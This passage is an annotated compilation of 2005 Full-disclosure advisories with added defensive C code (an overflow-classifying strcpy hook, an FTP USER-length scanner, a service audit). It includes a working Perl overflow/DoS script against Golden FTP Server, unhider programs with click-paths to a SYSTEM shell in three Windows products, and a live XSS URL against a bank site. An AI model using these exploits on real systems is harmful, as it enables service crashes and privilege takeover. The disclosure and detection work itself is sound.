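enum verdict classify_copy(uintptr_t dst, uintptr_t saved_ebp, size_t src_len)
{
    uintptr_t copy_end = dst + src_len + 1;
    uintptr_t ret_addr = saved_ebp + FRAME_WORD;

    if (dst >= ret_addr + FRAME_WORD)   /* destination is above this frame's control words */
        return COPY_SAFE;
    if (copy_end > ret_addr)            /* at least one byte lands in the return address */
        return COPY_HITS_RETURN_ADDR;
    if (copy_end > saved_ebp)           /* copy stops inside the saved frame pointer */
        return COPY_HITS_SAVED_EBP;
    return COPY_SAFE;
}

/* Constructed stand-in for a stack frame: local buffer, then the two control
 * words, contiguous in memory exactly as strcpy would run over them. */
#define BUF_SIZE 16
struct frame {
    char buf[BUF_SIZE];
    uint32_t saved_ebp;
    uint32_t ret;
};

/* The hook: classify first, and only let a safe copy through. */
enum verdict hooked_strcpy(struct frame *f, const char *src)
{
    enum verdict v = classify_copy((uintptr_t)f->buf, (uintptr_t)&f->saved_ebp, strlen(src));
    if (v == COPY_SAFE)
        strcpy(f->buf, src);
    else
        fprintf(stderr, "strcpy of %zu bytes into %p would reach %s\n", strlen(src) + 1,
                (void *)f->buf, v == COPY_HITS_RETURN_ADDR ? "the return address" : "the saved ebp");
    return v;
}

/* Run one source string against a fresh frame and return the verdict. */
enum verdict verdict_for(const char *src)
{
    struct frame f = { "", 0xBBBBBBBBu, 0xCCCCCCCCu };
    return hooked_strcpy(&f, src);
}

int main(void)
{
    char attack[BUF_SIZE + 2 * FRAME_WORD + 1];   /* enough 'A's to run through both words */
    memset(attack, 'A', sizeof attack - 1);
    attack[sizeof attack - 1] = '\0';

    printf("\"anonymous\": verdict %d\n", verdict_for("anonymous"));
    printf("%zu x 'A': verdict %d\n", strlen(attack), verdict_for(attack));
    return 0;
}
```

The model refuses the copy outright; the post says vulnfind instead substitutes the return address at run time, which is the step deliberately left out here. The boundary cases are the ones worth checking: a 15-byte string plus its NUL fills the 16-byte buffer exactly, a 16-byte string puts the NUL on the saved ebp, and 20 bytes is the first length that touches the return address.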

[Full-disclosure] Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)

2005-04-27 Thread Reed Arvin
Summary:
Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
(http://www.goldenftpserver.com/)

Details:
Passing an overly long username parameter to the FTP server causes the
EIP register to be overwritten after the USER/PASS login sequence is
completed. Once this has been done the FTP server will either crash or
execute code (depending on the value of the username) when the server
statistics are viewed by an administrator.

Vulnerable Versions:
Golden FTP Server Pro v2.52 (10.04.2005)

Patches/Workarounds:
The vendor was notified of the issue. There was no response.

Exploit:
Run the following PERL script against the server. Afterward, right
click on the Golden FTP Server Pro icon in the Windows tray and click
Statistic. The process will die.

#= Start GoldenFTPServer_Overflow.pl =
#
# Usage: GoldenFTPServer_Overflow.pl ip
#GoldenFTPServer_Overflow.pl 127.0.0.1
#
# KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
#
# Download:
# http://www.goldenftpserver.com/
#
##

use IO::Socket;
use strict;

die "Usage: $0 ip\n" unless @ARGV;

my $socket;

# Connect to the FTP control port of the target
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => 21,
                                    Proto    => "tcp"))
{
    print "Attempting to kill Golden FTP Server at $ARGV[0]:21...\n";

    sleep(1);

    # 332-byte username: the overly long value that ends up overwriting EIP
    print $socket "USER " . "A" x 332 . "\r\n";

    sleep(1);

    # Complete the USER/PASS sequence; the crash fires later from the Statistic view
    print $socket "PASS " . "\r\n";

    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:21\n";
}
#= End GoldenFTPServer_Overflow.pl =

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)

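As an added example that is not part of the advisory, the check a practitioner would put on the wire side of this bug: scan an FTP control-channel transcript for USER arguments longer than a chosen limit, using the 332-byte username the script above sends as the constructed attack input. The limit is an assumption (the advisory gives no buffer size) and the transcript lines are constructed for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Does a line of len bytes start with the FTP verb (case-insensitive) plus a space? */
static int has_verb(const char *line, size_t len, const char *verb)
{
    size_t vlen = strlen(verb);
    if (len < vlen + 1 || line[vlen] != ' ')
        return 0;
    for (size_t i = 0; i < vlen; i++)
        if (toupper((unsigned char)line[i]) != toupper((unsigned char)verb[i]))
            return 0;
    return 1;
}

/* Longest USER argument in a control-channel transcript (CRLF or LF line ends). */
size_t longest_user_arg(const char *transcript)
{
    size_t longest = 0;
    const char *p = transcript;
    while (*p) {
        size_t len = strcspn(p, "\r\n");
        if (has_verb(p, len, "USER") && len - 5 > longest)
            longest = len - 5;                 /* argument = line minus "USER " */
        p += len;
        p += strspn(p, "\r\n");                /* step over the line terminator */
    }
    return longest;
}

/* 1 if any USER argument in the transcript is longer than limit bytes. */
int user_arg_exceeds(const char *transcript, size_t limit)
{
    return longest_user_arg(transcript) > limit;
}

/* Constructed sample: an ordinary anonymous login. */
static const char BENIGN[] = "USER anonymous\r\nPASS guest@example\r\nQUIT\r\n";

/* Constructed sample: the 332-byte username the script above sends, then PASS. */
size_t build_attack_transcript(char *out, size_t cap)
{
    const size_t n = 332;
    const char tail[] = "\r\nPASS \r\n";
    size_t total = 5 + n + sizeof tail - 1;
    if (cap < total + 1)
        return 0;
    memcpy(out, "USER ", 5);
    memset(out + 5, 'A', n);
    memcpy(out + 5 + n, tail, sizeof tail);    /* copies the NUL too */
    return total;
}

/* Build the attack transcript into a local buffer and measure its USER argument. */
size_t attack_transcript_user_len(void)
{
    char buf[512];
    return build_attack_transcript(buf, sizeof buf) ? longest_user_arg(buf) : 0;
}

int main(void)
{
    const size_t limit = 128;   /* assumption: the advisory gives no buffer size */
    printf("benign: longest USER %zu, exceeds %zu: %d\n",
           longest_user_arg(BENIGN), limit, user_arg_exceeds(BENIGN, limit));
    printf("attack: longest USER %zu, exceeds %zu: %d\n",
           attack_transcript_user_len(), limit, attack_transcript_user_len() > limit);
    return 0;
}
```

The verb match is case-insensitive because FTP servers accept "user" as readily as "USER"; a scanner that only matched upper case would be trivially bypassed.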

[Full-disclosure] Privilege escalation in BulletProof FTP Server v2.4.0.31

2005-04-27 Thread Reed Arvin
Summary:
Privilege escalation in BulletProof FTP Server v2.4.0.31
(http://www.bpftpserver.com/)

Details:
When the BPFTPServer service is installed and running as LocalSystem
it is possible to manipulate the administrative interface and escalate
privileges to that of the LocalSystem account.

Vulnerable Versions:
BulletProof FTP Server v2.4.0.31

Patches/Workarounds:
The vendor was notified of the issue. There was no response.

Exploit:
1. Right click the BulletProof FTP Server tray icon and click Show Server.
2. Click the Help icon.
3. Internet Explorer will open (running under the context of the
LocalSystem account). Click File, Click Open.
4. Click Browse.
5. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe.  Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the
LocalSystem account.

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)


[Full-disclosure] Privilege escalation and password protection bypass in Altiris Client Service for Windows (Version 6.0.88)

2005-04-27 Thread Reed Arvin
Summary:
Privilege escalation and password protection bypass in Altiris Client
Service for Windows (Version 6.0.88)
(http://www.altiris.com/)

Details:
It is possible to manipulate the administrative interface of the
Altiris Client Service for Windows and escalate privileges to that of
the LocalSystem account.

When a password is set to protect the property pages of the Altiris
Client Service for Windows it is possible to bypass this and disable
the password protection feature.

Vulnerable Versions:
Altiris Client Service for Windows (Version 6.0.88)

Patches/Workarounds:
The vendor was notified of the issue. There was no response.

Exploit:
Compile and run the following code to unhide the Altiris Client Service window:

===Start Code===
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main( void )
{
    HWND hWnd;
    /* Title of the hidden top-level window owned by the LocalSystem service */
    char szWindowName[] = "Altiris Client Service";

    printf( "Finding window %s\n", szWindowName );

    /* Match on window title only (class name NULL) */
    hWnd = FindWindow( NULL, szWindowName );

    if ( hWnd == NULL )
    {
        printf( "ERROR! Could not find window %s\n", szWindowName );

        exit( 1 );
    }

    /* Make the hidden window visible on the interactive desktop */
    ShowWindow( hWnd, SW_SHOW );

    return 0;
}
===End Code===

1. The Altiris Client Service window will appear. Click Properties.
2. Click the Security tab and uncheck the Password protect Admin
properties box and uncheck the Hide client tray icon box. At this
point you have effectively bypassed the AClient password protection.
3. Click OK.
4. Click Close.
5. The AClient tray icon will appear in the lower right of the screen.
 Right click and choose View Log File.
6. Notepad will appear (running under the context of the LocalSystem
account). Click File, click Open.
7. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe.  Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the
LocalSystem account.

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)


[Full-disclosure] Privilege escalation in BakBone NetVault 7.1

2005-04-27 Thread Reed Arvin
Summary:
Privilege escalation in BakBone NetVault 7.1
(http://www.bakbone.com/)

Details:
The nvstatsmngr.exe process, which is a hidden command prompt window
that is permitted to interact with the Desktop, can be manipulated by
any local user to escalate privileges to that of the LocalSystem
account.

Vulnerable Versions:
BakBone NetVault 7.1

Patches/Workarounds:
The vendor was notified of the issue. They are working on a patch that
will be released shortly. The patch will be made available via
http://www.bakbone.com/.

Exploit:
Compile and run the following code to unhide the C:\Program
Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window:

===Start Code===
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main( void )
{
    HWND hWnd;
    /* The hidden console window is titled with the full path of the executable */
    char szWindowName[] = "C:\\Program Files\\BakBone Software\\NetVault\\bin\\nvstatsmngr.exe";

    printf( "Finding window %s\n", szWindowName );

    /* Match on window title only (class name NULL) */
    hWnd = FindWindow( NULL, szWindowName );

    if ( hWnd == NULL )
    {
        printf( "ERROR! Could not find window %s\n", szWindowName );

        exit( 1 );
    }

    /* Make the hidden window visible on the interactive desktop */
    ShowWindow( hWnd, SW_SHOW );

    return 0;
}
===End Code===

1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe
window will appear. Access the window menu in the upper left and click
Properties.
2. Right click on the word Window under the Display Options and click
What's This?
3. Right click on the help text that is shown in yellow and click Print Topic.
4. Right click on any printer and click Open.
5. Click Help, Help Topics.
6. Right click in the right side of the help screen and click View Source.
7. Notepad will appear (running under the context of the LocalSystem
account). Click File, click Open.
8. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe.  Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the
LocalSystem account.

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)

Assistance from David Rice drice[at]tep[dot]com

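The three advisories above (BulletProof FTP Server, Altiris Client Service, BakBone NetVault) share one root cause: a service running as LocalSystem whose process is allowed to interact with the desktop, so any File/Open, Help or Print dialog it spawns is a SYSTEM shell. As an added example, not code from any of those vendors, here is the audit check for that combination: the portable core evaluates the service type bits and start account, and the `_WIN32` section runs it over the live Service Control Manager via EnumServicesStatusEx/QueryServiceConfig. The sample service records and their names are constructed; treating an empty start name as LocalSystem follows CreateService's convention, and the `NT AUTHORITY\SYSTEM` alias is an assumption about how other tooling may print the account (QueryServiceConfig itself reports `LocalSystem`).

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* SERVICE_INTERACTIVE_PROCESS from winsvc.h, repeated here so the check
 * also compiles on a non-Windows host. */
#define SVC_INTERACTIVE 0x00000100u

/* Case-insensitive equality; strcasecmp is not ISO C. */
static int str_ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* QueryServiceConfig reports the account as "LocalSystem"; CreateService treats a
 * NULL or empty name the same way.  The SID name is an assumed alias for other tools. */
int runs_as_local_system(const char *start_name)
{
    if (start_name == NULL || *start_name == '\0')
        return 1;
    return str_ieq(start_name, "LocalSystem") || str_ieq(start_name, "NT AUTHORITY\\SYSTEM");
}

/* The combination the advisories rely on: the service process may put windows on
 * the interactive desktop, and whatever those windows launch runs as LocalSystem. */
int is_interactive_system_service(unsigned long service_type, const char *start_name)
{
    return (service_type & SVC_INTERACTIVE) != 0 && runs_as_local_system(start_name);
}

/* Constructed records in the shape QueryServiceConfig returns; names are made up. */
struct service_record { const char *name; unsigned long type; const char *start_name; };
static const struct service_record SAMPLE[] = {
    { "ExampleFtpSvc",  0x110, "LocalSystem" },                /* own process + interactive, SYSTEM */
    { "ExampleAgent",   0x110, NULL },                         /* NULL start name == LocalSystem */
    { "ExampleIndexer", 0x010, "LocalSystem" },                /* SYSTEM but not interactive */
    { "ExampleUpdater", 0x110, "NT AUTHORITY\\LocalService" },  /* interactive but low privilege */
};
#define SAMPLE_COUNT (sizeof SAMPLE / sizeof SAMPLE[0])

/* Count (and print) the records that trip the check. */
size_t count_flagged(const struct service_record *recs, size_t n)
{
    size_t flagged = 0;
    for (size_t i = 0; i < n; i++)
        if (is_interactive_system_service(recs[i].type, recs[i].start_name)) {
            printf("FLAG %s: type 0x%lx runs as %s\n", recs[i].name, recs[i].type,
                   recs[i].start_name ? recs[i].start_name : "(LocalSystem)");
            flagged++;
        }
    return flagged;
}

#ifdef _WIN32
#include <windows.h>
/* Same check over the live Service Control Manager; link with advapi32. */
int audit_scm(void)
{
    SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!scm) return -1;
    DWORD needed = 0, count = 0, resume = 0, flagged = 0;
    EnumServicesStatusExA(scm, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL,
                          NULL, 0, &needed, &count, &resume, NULL);   /* size query */
    ENUM_SERVICE_STATUS_PROCESSA *list = malloc(needed);
    resume = 0;
    if (!list || !EnumServicesStatusExA(scm, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL,
                                        (LPBYTE)list, needed, &needed, &count, &resume, NULL)) {
        free(list); CloseServiceHandle(scm); return -1;
    }
    for (DWORD i = 0; i < count; i++) {
        SC_HANDLE svc = OpenServiceA(scm, list[i].lpServiceName, SERVICE_QUERY_CONFIG);
        DWORD cfg_size = 0;
        if (!svc) continue;
        QueryServiceConfigA(svc, NULL, 0, &cfg_size);                 /* size query */
        QUERY_SERVICE_CONFIGA *cfg = malloc(cfg_size);
        if (cfg && QueryServiceConfigA(svc, cfg, cfg_size, &cfg_size) &&
            is_interactive_system_service(cfg->dwServiceType, cfg->lpServiceStartName)) {
            printf("FLAG %s: %s\n", list[i].lpServiceName, cfg->lpBinaryPathName);
            flagged++;
        }
        free(cfg);
        CloseServiceHandle(svc);
    }
    free(list);
    CloseServiceHandle(scm);
    return (int)flagged;
}
#endif

int main(void)
{
#ifdef _WIN32
    printf("%d interactive LocalSystem services\n", audit_scm());
#else
    printf("%zu of %zu sample records flagged\n", count_flagged(SAMPLE, SAMPLE_COUNT), SAMPLE_COUNT);
#endif
    return 0;
}
```

On Windows, build with cl or MinGW and link advapi32; on any other host it exercises the check over the constructed records. For a service it flags, the fix is to run it under a less privileged account or to drop the interactive flag (sc config <name> type= own, which sets the type without interact); the unhider programs in the advisories above only work against windows on the interactive desktop, which is exactly what that flag grants.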

Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS

2005-04-27 Thread Dominik Birk
http://www.deutsche-bank.de/ir/index.html?contentOverload=http://www.deutsche-bank.de/ir/releaseliste01.shtml&loadFlash=http://www.code-foundation.de/zeitlich/foo.html

My 2 cents.

Cheers
Dominik
